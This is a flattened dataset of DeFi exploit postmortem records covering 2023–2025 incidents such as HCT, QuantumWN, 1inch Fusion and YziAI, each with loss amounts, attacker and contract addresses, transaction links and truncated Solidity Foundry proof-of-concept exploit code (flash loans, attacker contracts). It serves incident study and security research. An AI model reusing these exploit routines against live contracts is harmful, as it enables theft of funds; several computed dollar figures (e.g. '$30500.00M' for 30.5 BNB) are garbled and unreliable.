https://bscscan.com/tx/0x66dee84591aeeba6e5f31e12fe728f2ddc79a06426036793487a980c3b952947
null
https://twitter.com/CertiKAlert/status/1700128158647734745
true
true
false
low
59.5 ETH and ~72.1k USDT (~$169k)
unknown
false
59.5 ETH and ~72.1k USDT (~$169k)
https://bscscan.com/address/0x73d80500b30a6ca840bfab0234409d98cf588089
https://bscscan.com/address/0xfdc6a621861ed2a846ab475c623e13764f6a5ad0
https://bscscan.com/tx/0x66dee84591aeeba6e5f31e12fe728f2ddc79a06426036793487a980c3b952947
https://twitter.com/CertiKAlert/status/1700128158647734745
$60
5.35
medium
APIG Exploit (2023-09)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~0.5 ETH // TX : https://app.blocksec.com/explorer/tx/eth/0xa4659632a983b3bfd1b6248fd52d8f247a9fcdc1915f7d38f01008cff285d0bf // Attacker : https://etherscan.io/address/...
exploit_poc
QuantumWN
2023-09
QuantumWN_exp.sol
flash_loan
50a9fd18548d4a27
2026-01-07T10:59:16.531862
postmortems
ethereum
18,070,348
~0.5 ETH
0.5
https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
https://etherscan.io/address/0x154863eb71de4a34f88ea57450840eab1c71aba6
null
null
null
null
true
false
true
low
~0.5 ETH
flash-loan
function testExploit() public { address[] memory token = new address[](1); token[0] = address(WETH); uint256[] memory amount = new uint256[](1); amount[0] = 5 ether; balancer.flashLoan(address(this), token, amount, hex"28"); emit log_named_decimal_uint("[End] Attacker WET...
true
https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
https://etherscan.io/address/0x154863eb71de4a34f88ea57450840eab1c71aba6
$0
6.56
medium
QuantumWN Exploit (2023-09)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 30.5BNB // Attacker : https://bscscan.com/address/0xc892d5576c65e5b0db194c1a28aa758a43bb42a5 // Attack Contract : https://bscscan.com/address/0xd7a2fc756e1053b152f909901...
exploit_poc
HCT
2023-09
HCT_exp.sol
flash_loan
f1061225cbfdbc9b
2026-01-07T10:59:16.531907
postmortems
bsc
31,528,198
30.5BNB
30,500,000,000
https://bscscan.com/address/0xc892d5576c65e5b0db194c1a28aa758a43bb42a5
https://bscscan.com/address/0xd7a2fc756e1053b152f90990129f94c573e006fd
null
https://bscscan.com/tx/0x84bd77f25cc0db493c339a187c920f104a69f89053ab2deabb93c35220e6dfc0
null
https://twitter.com/leovctech/status/1699775506785198499
true
true
true
critical
30.5BNB
flash-loan
false
30.5BNB
https://bscscan.com/address/0xc892d5576c65e5b0db194c1a28aa758a43bb42a5
https://bscscan.com/address/0xd7a2fc756e1053b152f90990129f94c573e006fd
https://bscscan.com/tx/0x84bd77f25cc0db493c339a187c920f104a69f89053ab2deabb93c35220e6dfc0
https://twitter.com/leovctech/status/1699775506785198499
$30500.00M
5.92
medium
HCT Exploit (2023-09)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~8ETH // Attacker : https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 // Attack Contract : https://etherscan.io/address/0x8faa53a742fc732b04db4090a...
exploit_poc
HeavensGate
2023-09
HeavensGate_exp.sol
null
3788180a3b726a75
2026-01-07T10:59:16.531963
postmortems
ethereum
null
~8ETH
8
https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
https://etherscan.io/address/0x8faa53a742fc732b04db4090a21e955fe5c230be
null
https://etherscan.io/tx/0xe28ca1f43036f4768776805fb50906f8172f75eba3bf1d9866bcd64361fda834
null
https://twitter.com/hexagate_/status/1699003711937216905
true
true
false
low
~8ETH
unknown
false
~8ETH
https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
https://etherscan.io/address/0x8faa53a742fc732b04db4090a21e955fe5c230be
https://etherscan.io/tx/0xe28ca1f43036f4768776805fb50906f8172f75eba3bf1d9866bcd64361fda834
https://twitter.com/hexagate_/status/1699003711937216905
$8
5.09
medium
HeavensGate Exploit (2023-09)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~ 56.9 BNB // Attacker : https://bscscan.com/address/0x506eebd8d6061202a8e8fc600bb3d5d41f475ee1 // Attack Contract : https://bscscan.com/address/0x202e059a16d29a2f6ae030...
exploit_poc
XSDWETHpool
2023-09
XSDWETHpool_exp.sol
flash_loan
ebbf1e5555f88dc6
2026-01-07T10:59:16.532012
postmortems
bsc
32,086,901
~ 56.9 BNB
56,900,000,000
https://bscscan.com/address/0x506eebd8d6061202a8e8fc600bb3d5d41f475ee1
https://bscscan.com/address/0x202e059a16d29a2f6ae0307ae3d574746b2b6305
https://bscscan.com/address/0xfadda925e10d07430f5d7461689fd90d3d81bb48
https://bscscan.com/tx/0xbdf76f22c41fe212f07e24ca7266d436ef4517dc1395077fabf8125ebe304442
null
https://twitter.com/CertiKAlert/status/1706765042916450781
true
true
true
critical
~ 56.9 BNB
flash-loan
false
~ 56.9 BNB
https://bscscan.com/address/0x506eebd8d6061202a8e8fc600bb3d5d41f475ee1
https://bscscan.com/address/0x202e059a16d29a2f6ae0307ae3d574746b2b6305
https://bscscan.com/address/0xfadda925e10d07430f5d7461689fd90d3d81bb48
https://bscscan.com/tx/0xbdf76f22c41fe212f07e24ca7266d436ef4517dc1395077fabf8125ebe304442
https://twitter.com/CertiKAlert/status/1706765042916450781
$56900.00M
7.55
medium
XSDWETHpool Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 8.495 ETH // Attacker : https://etherscan.io/address/0x7a6488348a7626c10e35df9ae0a2ad916a56a952 // Attack Contract : https://etherscan.io/address/0x9926796371e0107abe406...
exploit_poc
SBRToken
2025-03
SBRToken_exp.sol
null
dde1b1a8d650a23e
2026-01-07T10:59:16.532069
postmortems
ethereum
21,991,722
~ 8.495 ETH
8.495
https://etherscan.io/address/0x7a6488348a7626c10e35df9ae0a2ad916a56a952
https://etherscan.io/address/0x9926796371e0107abe406128fa801fda0e436f44
null
https://etherscan.io/tx/0xe4c1aeacf8c93f8e39fe78420ce7a114ecf59dea90047cd2af390b30af54e7b9
null
https://x.com/TenArmorAlert/status/1897826817429442652
true
true
false
low
~ 8.495 ETH
unknown
function testExploit() public { emit log_named_decimal_uint("ETH before attack", attacker.balance, 18); vm.prank(attacker); AttackerC attC = new AttackerC{value: 0.000000000000004 ether}(); attC.attack(); vm.stopPrank(); emit log_named_decimal_uint("ETH after attack", a...
true
~ 8.495 ETH
https://etherscan.io/address/0x7a6488348a7626c10e35df9ae0a2ad916a56a952
https://etherscan.io/address/0x9926796371e0107abe406128fa801fda0e436f44
https://etherscan.io/tx/0xe4c1aeacf8c93f8e39fe78420ce7a114ecf59dea90047cd2af390b30af54e7b9
https://x.com/TenArmorAlert/status/1897826817429442652
$8
6.3
medium
SBRToken Exploit (2025-03)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 11902 BUSD // Attacker : https://bscscan.com/address/0x8aea7516b3b6aabf474f8872c5e71c1a7907e69e // Attack Contract : https://bscscan.com/address/0x0489E8433e4E74fB1ba938dF...
exploit_poc
BBXToken
2025-03
BBXToken_exp.sol
null
43b4dac569560de6
2026-01-07T10:59:16.532124
postmortems
bsc
47,626,457
11902 BUSD
11,902,000,000,000
https://bscscan.com/address/0x8aea7516b3b6aabf474f8872c5e71c1a7907e69e
https://bscscan.com/address/0x0489E8433e4E74fB1ba938dF712c954DDEA93898
https://bscscan.com/address/0x6051428b580f561b627247119eed4d0483b8d28e
https://bscscan.com/tx/0x0dd486368444598610239b934dd9e8c6474a06d11380d1cfec4d91568b5ac581
https://blog.solidityscan.com/bbx-token-hack-analysis-f2e962c00ee5
https://x.com/TenArmorAlert/status/1916312483792408688
true
true
false
critical
11902 BUSD
unknown
function testExploit() public { // Deploy the attack contract vm.prank(attacker); AttackerC attC = new AttackerC{value: 0.05 ether}(); vm.roll(47626727 - 1); // Attack tx block vm.warp(block.timestamp + 15 * 60); // Warp time vm.startPrank(attacker); attC.attac...
true
11902 BUSD
https://bscscan.com/address/0x8aea7516b3b6aabf474f8872c5e71c1a7907e69e
https://bscscan.com/address/0x0489E8433e4E74fB1ba938dF712c954DDEA93898
https://bscscan.com/address/0x6051428b580f561b627247119eed4d0483b8d28e
https://bscscan.com/tx/0x0dd486368444598610239b934dd9e8c6474a06d11380d1cfec4d91568b5ac581
https://blog.solidityscan.com/bbx-token-hack-analysis-f2e962c00ee5
https://x.com/TenArmorAlert/status/1916312483792408688
$11902000.00M
8.26
high
BBXToken Exploit (2025-03)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH) // Original Attacker : https://etherscan.io/address/0x27defcfa6498f957918f407ed8a58eba2884768c // Attack Contract(Main)...
exploit_poc
LeverageSIR
2025-03
LeverageSIR_exp.sol
null
b6a86d04c18800cd
2026-01-07T10:59:16.532202
postmortems
ethereum
22,157,900
~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH)
353,800
https://etherscan.io/address/0x27defcfa6498f957918f407ed8a58eba2884768c
null
https://etherscan.io/address/0xb91ae2c8365fd45030aba84a4666c4db074e53e7
https://etherscan.io/tx/0xa05f047ddfdad9126624c4496b5d4a59f961ee7c091e7b4e38cee86f1335736f
null
null
true
false
false
high
~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH)
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC_A attC_A = new AttackerC_A(); AttackerC_B attC_B = new AttackerC_B(); while (address(attC_A) < address(attC_B)) { attC_B = new AttackerC_B(); } attC_A.attack(attC_B); console2.log...
true
~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH)
https://etherscan.io/address/0x27defcfa6498f957918f407ed8a58eba2884768c
https://etherscan.io/address/0xb91ae2c8365fd45030aba84a4666c4db074e53e7
https://etherscan.io/tx/0xa05f047ddfdad9126624c4496b5d4a59f961ee7c091e7b4e38cee86f1335736f
$353.8K
9
high
LeverageSIR Exploit (2025-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 4.5M // Attacker : https://etherscan.io/address/0xA7264a43A57Ca17012148c46AdBc15a5F951766e // Attack Contract : https://etherscan.io/address/0x019BfC71D43c3492926D4A9a6C7...
exploit_poc
OneInchFusionV1SettlementHack.sol
2025-03
OneInchFusionV1SettlementHack.sol_exp.sol
null
645d24d86640b12b
2026-01-07T10:59:16.532374
postmortems
ethereum
null
4.5M
4,500,000
https://etherscan.io/address/0xA7264a43A57Ca17012148c46AdBc15a5F951766e
https://etherscan.io/address/0x019BfC71D43c3492926D4A9a6C781F36706970C9
https://etherscan.io/address/0xa88800cd213da5ae406ce248380802bd53b47647
https://etherscan.io/tx/0x62734ce80311e64630a009dd101a967ea0a9c012fabbfce8eac90f0f4ca090d6
https://blog.decurity.io/yul-calldata-corruption-1inch-postmortem-a7ea7a53bfd9
https://x.com/DecurityHQ/status/1898069385199153610
true
true
false
critical
4.5M
unknown
function testExploit() public { uint256 AMOUNT_TO_STEAL = 0xE8D4A51000; // 1M bytes1 _CONTINUE_INTERACTION = 0x00; // Beauty of abi encoding, discerning between a dynamic type that's bytes(0) (thus getting a dynamic offset), // and a static type inplace is not possible, so masquerading...
true
4.5M
https://etherscan.io/address/0xA7264a43A57Ca17012148c46AdBc15a5F951766e
https://etherscan.io/address/0x019BfC71D43c3492926D4A9a6C781F36706970C9
https://etherscan.io/address/0xa88800cd213da5ae406ce248380802bd53b47647
https://etherscan.io/tx/0x62734ce80311e64630a009dd101a967ea0a9c012fabbfce8eac90f0f4ca090d6
https://blog.decurity.io/yul-calldata-corruption-1inch-postmortem-a7ea7a53bfd9
https://x.com/DecurityHQ/status/1898069385199153610
$4.50M
9
high
OneInchFusionV1SettlementHack.sol Exploit (2025-03)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 22470 USD // Attacker : https://bscscan.com/address/0x8842dd26fd301c74afc4df12e9cdabd9db107d1e // Attack Contract : https://bscscan.com/address/0x03ca8b574dd4250576f7bccc5...
exploit_poc
H2O
2025-03
H2O_exp.sol
null
b278332219ba261a
2026-01-07T10:59:16.532494
postmortems
bsc
47,454,899
22470 USD
22,470
https://bscscan.com/address/0x8842dd26fd301c74afc4df12e9cdabd9db107d1e
https://bscscan.com/address/0x03ca8b574dd4250576f7bccc5707e6214e8c6e0d
https://bscscan.com/address/0xe9c4d4f095c7943a9ef5ec01afd1385d011855a1
null
null
null
true
false
false
medium
22470 USD
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC attC = new AttackerC(); // Fund the contract deal(BUSD, address(attC), 300 ether); // 1st attack(No profit): https://bscscan.com/tx/0x729c502a7dfd5332a9bdbcacec97137899ecc82c17d0797b9686a7f9f6005cb7 _setRand...
true
22470 USD
https://bscscan.com/address/0x8842dd26fd301c74afc4df12e9cdabd9db107d1e
https://bscscan.com/address/0x03ca8b574dd4250576f7bccc5707e6214e8c6e0d
https://bscscan.com/address/0xe9c4d4f095c7943a9ef5ec01afd1385d011855a1
$22.5K
7.65
medium
H2O Exploit (2025-03)
true
true
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 14K USD // Attacker : https://etherscan.io/address/0x97d8170e04771826a31c4c9b81e9f9191a1c8613 // Attack Contract : https://etherscan.io/address/0x2901c8b8e6d9f2c9f848987ded74b776ab1f973e // Vulnerable Contract ...
exploit_poc
UNI
2025-03
UNI_exp.sol
null
cd1e4a6dc0fca9ae
2026-01-07T10:59:16.532558
postmortems
ethereum
21,992,033
14K USD
14,000
https://etherscan.io/address/0x97d8170e04771826a31c4c9b81e9f9191a1c8613
https://etherscan.io/address/0x2901c8b8e6d9f2c9f848987ded74b776ab1f973e
https://etherscan.io/address/0x76ea342bc038d665e8a116392c82552d2605eda1
https://app.blocksec.com/explorer/tx/eth/0x6c8aed8d0eab29416cd335038cd5ee68c5e27bfb001c9eac7fc14c7075ed4420?line=0
https://x.com/CertiKAlert/status/1897973904653607330
https://x.com/CertiKAlert/status/1897973904653607330
true
true
false
medium
14K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC{value: 4e-15 ether}(); // deal(address(attC), 4e-15 ether); vm.stopPrank(); emit...
true
14K USD
https://etherscan.io/address/0x97d8170e04771826a31c4c9b81e9f9191a1c8613
https://etherscan.io/address/0x2901c8b8e6d9f2c9f848987ded74b776ab1f973e
https://etherscan.io/address/0x76ea342bc038d665e8a116392c82552d2605eda1
https://app.blocksec.com/explorer/tx/eth/0x6c8aed8d0eab29416cd335038cd5ee68c5e27bfb001c9eac7fc14c7075ed4420?line=0
https://x.com/CertiKAlert/status/1897973904653607330
https://x.com/CertiKAlert/status/1897973904653607330
$14.0K
8.15
high
UNI Exploit (2025-03)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import {Test, console} from "forge-std/Test.sol"; // @KeyInfo - Total Lost : ~442k // Attacker : https://bscscan.com/address/0x00c58434f247dfdca49b9ee82f3013bac96f60ff // Attack Contract : https://bscscan.com/address/0x77ab960503659711498a4c0bc99a84e8d0a...
exploit_poc
DCFToken
2025-03
DCFToken_exp.sol
null
c60778c70968bcd8
2026-01-07T10:59:16.532672
postmortems
bsc
44,290,969
~442k
442,000
https://bscscan.com/address/0x00c58434f247dfdca49b9ee82f3013bac96f60ff
https://bscscan.com/address/0x77ab960503659711498a4c0bc99a84e8d0a47589
https://bscscan.com/address/0x8487f846d59f8fb4f1285c64086b47e2626c01b6
https://bscscan.com/tx/0xb375932951c271606360b6bf4287d080c5601f4f59452b0484ea6c856defd6fd
null
https://x.com/Phalcon_xyz/status/1860890801909190664
true
true
false
high
~442k
unknown
function testExploit() public { attack_Contract.exploit(); } } contract Attack_Contract { struct Pancake { address addr; uint amount; bool bUSDIndex; } address[] path = new address[](2); Pancake[] pancakeV3Pools; Pancake[] pancakeSwapV2s; IBEP20 BUSD = IBEP20...
true
~442k
https://bscscan.com/address/0x00c58434f247dfdca49b9ee82f3013bac96f60ff
https://bscscan.com/address/0x77ab960503659711498a4c0bc99a84e8d0a47589
https://bscscan.com/address/0x8487f846d59f8fb4f1285c64086b47e2626c01b6
https://bscscan.com/tx/0xb375932951c271606360b6bf4287d080c5601f4f59452b0484ea6c856defd6fd
https://x.com/Phalcon_xyz/status/1860890801909190664
$442.0K
9
high
DCFToken Exploit (2025-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 5 ETH // Attacker : https://basescan.org/address/0x2383a550e40a61b41a89da6b91d8a4a2452270d0 // Attack Contract : https://basescan.org/address/0x652f9ac437a870ce273a0be9d7e7...
exploit_poc
DUCKVADER
2025-03
DUCKVADER_exp.sol
null
8566d9a0bda4c8c6
2026-01-07T10:59:16.532764
postmortems
base
null
~ 5 ETH
5
https://basescan.org/address/0x2383a550e40a61b41a89da6b91d8a4a2452270d0
https://basescan.org/address/0x652f9ac437a870ce273a0be9d7e7ee03043a91ff
https://basescan.org/address/0xaa8f35183478b8eced5619521ac3eb3886e98c56
https://basescan.org/tx/0x9bb1401233bb9172ede2c3bfb924d5d406961e6c63dee1b11d5f3f79f558cae4
null
https://x.com/TenArmorAlert/status/1899378096056201414
true
true
false
low
~ 5 ETH
unknown
function testExploit() public balanceLog { AttackContract attackContract = new AttackContract(); attackContract.attack(); } receive() external payable { // This contract is used to receive ETH from the attack contract } } contract AttackContract { address attacker; constru...
true
~ 5 ETH
https://basescan.org/address/0x2383a550e40a61b41a89da6b91d8a4a2452270d0
https://basescan.org/address/0x652f9ac437a870ce273a0be9d7e7ee03043a91ff
https://basescan.org/address/0xaa8f35183478b8eced5619521ac3eb3886e98c56
https://basescan.org/tx/0x9bb1401233bb9172ede2c3bfb924d5d406961e6c63dee1b11d5f3f79f558cae4
https://x.com/TenArmorAlert/status/1899378096056201414
$5
7.4
medium
DUCKVADER Exploit (2025-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 11.29 BNB ($6.4K) // Attacker : https://bscscan.com/address/0x5d6e908c4cd6eda1c2a9010d1971c7d62bdb5cd3 // Attack Contract : https://bscscan.com/address/0x0e220c6c52d383869a...
exploit_poc
Pump
2025-03
Pump_exp.sol
null
1956a607bb13d47b
2026-01-07T10:59:16.532820
postmortems
bsc
null
~ 11.29 BNB ($6.4K)
11,290,000,000
https://bscscan.com/address/0x5d6e908c4cd6eda1c2a9010d1971c7d62bdb5cd3
https://bscscan.com/address/0x0e220c6c52d383869a5085ef074b6028254b3462
null
https://bscscan.com/tx/0xdebaa13fb06134e63879ca6bcb08c5e0290bdbac3acf67914c0b1dcaf0bdc3dd
null
https://x.com/TenArmorAlert/status/1897115993962635520
true
true
false
critical
~ 11.29 BNB ($6.4K)
unknown
function testExploit() public balanceLog { AttackContract attackContract = new AttackContract(); address[] memory tokenPairs = new address[](4); tokenPairs[0] = TAGAIFUN_TOKEN; tokenPairs[1] = GROK_TOKEN; tokenPairs[2] = PEPE_TOKEN; tokenPairs[3] = TEST_TOKEN; att...
true
~ 11.29 BNB ($6.4K)
https://bscscan.com/address/0x5d6e908c4cd6eda1c2a9010d1971c7d62bdb5cd3
https://bscscan.com/address/0x0e220c6c52d383869a5085ef074b6028254b3462
https://bscscan.com/tx/0xdebaa13fb06134e63879ca6bcb08c5e0290bdbac3acf67914c0b1dcaf0bdc3dd
https://x.com/TenArmorAlert/status/1897115993962635520
$11290.00M
7.64
medium
Pump Exploit (2025-03)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "../basetest.sol"; import {IERC20, WETH} from "../interface.sol"; // @KeyInfo - Total Lost : ~767 US$ // Attacker : 0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 // Attack Contract : 0x3783c91ee49a303c17c558f92bf8d6395d2f76e3 // Vulnerable Contract ...
exploit_poc
wKeyDAO
2025-03
wKeyDAO_exp.sol
flash_loan
a57e27c90817272b
2026-01-07T10:59:16.532876
postmortems
unknown
47,469,060
~767 US$
767
null
null
null
https://app.blocksec.com/explorer/tx/bsc/0xc9bccafdb0cd977556d1f88ac39bf8b455c0275ac1dd4b51d75950fb58bad4c8?line=12
https://x.com/Phalcon_xyz/status/1900809936906711549
null
true
true
true
low
~767 US$
flash-loan
function testPoC() public { vm.startPrank(attacker); Attacker attc = new Attacker(); uint balanceBefore = IERC20(BUSD).balanceOf(address(attc)); attc.fire(); uint balanceAfter = IERC20(BUSD).balanceOf(address(attc)); console2.log("Profit: ", (balanceAfter - balanceB...
true
~767 US$
https://app.blocksec.com/explorer/tx/bsc/0xc9bccafdb0cd977556d1f88ac39bf8b455c0275ac1dd4b51d75950fb58bad4c8?line=12
https://x.com/Phalcon_xyz/status/1900809936906711549
$767
8.5
high
wKeyDAO Exploit (2025-03)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 376 BNB // Attacker : https://bscscan.com/address/0x63fc3ff98de8d5ca900e68e6c6f41a7ca949c453 // Attack Contract : // Vulnerable Contract : https://bscscan.com/address/0x7fdf...
exploit_poc
YziAIToken
2025-03
YziAIToken_exp.sol
null
6c174b496ae02355
2026-01-07T10:59:16.532934
postmortems
bsc
null
~ 376 BNB
376,000,000,000
https://bscscan.com/address/0x63fc3ff98de8d5ca900e68e6c6f41a7ca949c453
null
https://bscscan.com/address/0x7fdff64bf87bad52e6430bda30239bd182389ee3
https://bscscan.com/tx/0x4821392c0b27a4acc952ff51f07ed5dc74d4b67025c57232dae44e4fef1f30e8
null
https://x.com/TenArmorAlert/status/1905528525785805027
true
true
false
critical
~ 376 BNB
unknown
function testExploit() public { emit log_named_decimal_uint("BNB balance before attack", attacker.balance, 18); vm.startPrank(attacker); IERC20(YziAI).transferFrom(CAKE_LP, CAKE_LP, 1_199_002_345); vm.stopPrank(); emit log_named_decimal_uint("BNB balance after attack", attacker.b...
true
~ 376 BNB
https://bscscan.com/address/0x63fc3ff98de8d5ca900e68e6c6f41a7ca949c453
https://bscscan.com/address/0x7fdff64bf87bad52e6430bda30239bd182389ee3
https://bscscan.com/tx/0x4821392c0b27a4acc952ff51f07ed5dc74d4b67025c57232dae44e4fef1f30e8
https://x.com/TenArmorAlert/status/1905528525785805027
$376000.00M
7.22
medium
YziAIToken Exploit (2025-03)
true
true
true
false